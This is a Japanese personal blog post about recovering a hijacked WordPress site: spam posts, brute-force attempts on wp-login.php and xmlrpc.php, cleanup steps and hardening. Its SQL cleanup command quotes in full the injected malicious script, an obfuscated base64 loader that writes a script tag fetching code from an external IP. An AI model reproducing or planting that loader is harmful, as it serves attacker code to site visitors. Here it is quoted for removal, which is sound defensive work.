WPが乗っ取られていました

IT

スポンサーリンク

ほとんどブログを更新していなかったので気が付かなかったのですが、ここ数日身に覚えのない英文記事が投稿されていました。

発覚したのは普段全くないピンバック承認のメールが来たことです。今頃どの記事に興味がもたれたのかと確認するためにダッシュボードを開きました。

身に覚えのない英文記事は確証はないのですがダッシュボードから普通に書かれたようでした。作成者は自分のユーザー名だったため、IDとパスワードが見破られたか、流出による乗っ取りだと思われます。

乗っ取られたにも関わらず、不正な記事の投稿だけに止まったのは幸いだったかもしれません。すべての記事が消され、ブログを全く別物に作り替えられ、ログインもできなくなる可能性もあったはずです。

XREAサーバーを利用しているのですが、サーバー設定のコントロールパネルのセキュリティ項目にWPログイン制限というものがあり、海外からのWPログインを制限することができるようです。設定ではONとなっていたのですが、国内からの攻撃だったのか、独自にインストールしたワードプレスは対象ではないのかこの機能では今回の攻撃を防ぐことはできませんでした。

対応

取り急ぎパスワードを変更し、不正な記事数も10件ほどだったので手動で削除しました。

サーバーのログを見てみると最近ログインをしていないにも関わらず 複数のIPから”wp-login.php”と”xmlrpc.php” へのPOSTが見受けられます。この中から突破してきたアクセスがあるのでしょう。

https://sitecheck.sucuri.net/でチェックするとfeedにMalwareが仕込まれてるという結果がでました。
さらに調べてみると各記事にスクリプトが挿入されていました。こちらの記事に書かれている内容とほぼ同じでした。

記事を参考に wp_posts を更新しました。

UPDATE wp_posts SET post_content=REPLACE(post_content, '<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write(''<script src="''+src+''"><\\/script>'')} </script><!--/codes_iframe-->', '');

対策

WP、プラグイン、テーマのバージョンアップを行いました。

WP Cerber Securityをインストールしました。

しばらくたってからWP Cerber Securityをチェックしてみると、
“wp-login.php”と”xmlrpc.php” への アクセスが引き続きされているのがわかりました。

WP Cerber Security の機能を使ってログインフォームに reCAPTCHA を設定しました。

参考サイト

https://wpdocs.osdn.jp/WordPress_%E3%82%B5%E3%82%A4%E3%83%88%E3%81%8C%E8%A2%AB%E5%AE%B3%E3%82%92%E5%8F%97%E3%81%91%E3%81%9F%E3%82%89

https://www.biyoshitu.biz/blog/wordpress-cracking/

https://nomaddesignerstips.com/wordpress-was-hacked/

スポンサーリンク

IT